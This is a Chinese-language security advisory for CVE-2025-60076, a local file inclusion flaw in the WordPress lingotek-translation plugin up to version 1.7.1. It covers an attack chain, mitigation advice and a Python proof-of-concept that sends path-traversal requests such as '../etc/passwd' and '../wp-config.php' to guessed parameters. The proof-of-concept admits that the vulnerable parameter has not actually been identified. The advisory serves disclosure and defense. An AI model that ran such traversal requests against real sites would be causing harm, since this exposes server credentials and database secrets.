CVE-2025-60076 WordPress lingotek-translation插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60076

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress lingotek-translation插件 (Ray Enterprise Translation)

漏洞概述

CVE-2025-60076是WordPress平台lingotek-translation插件中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP程序中文件包含/请求语句的不当控制漏洞，即PHP本地文件包含(Local File Inclusion, LFI)漏洞。漏洞存在于Ray Enterprise Translation组件中，影响版本从初始版本到1.7.1及以下所有版本。攻击者无需认证即可利用此漏洞，通过构造恶意的文件包含请求，读取服务器上的敏感文件，如配置文件、密码文件、源代码等。在特定配置下，攻击者甚至可能结合其他漏洞实现远程代码执行，从而完全控制受影响的Web服务器。该漏洞由Patchstack安全团队的审计人员[email protected]发现并报告，披露日期为2025年12月18日。由于该漏洞利用复杂度较低且影响范围广泛，建议所有使用受影响版本插件的用户立即采取修复措施。

技术细节

该漏洞是由于lingotek-translation插件在处理文件包含请求时，对用户输入的filename参数缺乏充分的验证和过滤所导致。攻击者可以通过HTTP请求中的特定参数，指定任意本地文件路径，插件代码会将其包含并执行。在PHP应用程序中，如果文件包含函数(如include、require、include_once、require_once)直接使用用户可控的输入作为文件路径，攻击者就可以读取服务器上的任意文件。常见的利用方式包括：1) 读取/etc/passwd等系统文件获取用户信息；2) 读取WordPress配置文件wp-config.php获取数据库凭证和API密钥；3) 读取其他敏感配置文件；4) 结合日志文件或session文件实现代码执行。漏洞的CVSS向量显示攻击复杂度为高(AC:H)，需要用户交互(UI:R)，但由于无需认证(PR:N)且可通过网络远程利用(AV:N)，对未修复系统构成严重威胁。攻击者通常会使用路径遍历技术(如../../etc/passwd)来访问系统文件。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用WordPress CMS，并通过扫描或指纹识别确定安装了lingotek-translation插件且版本<=1.7.1

STEP 2

步骤2: 漏洞点识别

攻击者分析插件代码结构，定位存在文件包含功能的PHP文件，识别可被用户控制的输入参数

STEP 3

步骤3: 构造恶意请求

攻击者构造包含路径遍历序列(如../../etc/passwd)的HTTP请求，通过URL参数或POST数据提交到存在漏洞的端点

STEP 4

步骤4: 敏感文件读取

服务器执行include/require语句，将目标文件内容包含到响应中返回给攻击者，泄露系统文件或配置文件内容

STEP 5

步骤5: 权限提升/远程代码执行

如果成功读取wp-config.php获取数据库凭证，攻击者可能进一步利用；或通过日志文件注入PHP代码实现RCE

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60076 PoC - WordPress lingotek-translation LFI
# Affected: Ray Enterprise Translation <= 1.7.1

import requests
import sys
from urllib.parse import quote

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'

# Common WordPress paths for lingotek-translation plugin
paths = [
    '/wp-content/plugins/lingotek-translation/admin/lib/',
    '/wp-content/plugins/lingotek-translation/',
    '/wp-content/plugins/lingotek-translation/js/',
]

# Vulnerable parameters to test (need to be identified from source)
vulnerable_params = ['file', 'page', 'action', 'controller', 'template']

# Files to read
files_to_check = [
    '../../../../../../../../../etc/passwd',
    '../../../../../../../../../wp-config.php',
    '../../../../../../../../../var/www/html/wp-config.php',
    '../wp-config.php'
]

print(f"[*] Testing CVE-2025-60076 LFI on {target}")
print(f"[*] Target plugin: lingotek-translation (Ray Enterprise Translation)")

for path in paths:
    for param in vulnerable_params:
        for file_path in files_to_check:
            url = f"{target}{path}?{param}={file_path}"
            try:
                r = requests.get(url, timeout=10, verify=False)
                if 'root:' in r.text or '<?php' in r.text:
                    print(f"[+] VULNERABLE! {url}")
                    print(f"[+] Content snippet: {r.text[:500]}")
            except requests.RequestException as e:
                print(f"[-] Error: {e}")

print("\n[*] Manual testing recommended - check source code for exact vulnerable endpoint")

影响范围

Ray Enterprise Translation (lingotek-translation) <= 1.7.1

防御指南

临时缓解措施

在官方补丁发布前，建议临时禁用lingotek-translation插件或将其替换为其他翻译插件；同时在Web服务器层面配置URL参数白名单过滤，拒绝包含../等路径遍历字符的请求；确保PHP配置中allow_url_fopen和allow_url_include设置为Off；限制网站目录访问权限，防止通过文件包含读取敏感文件。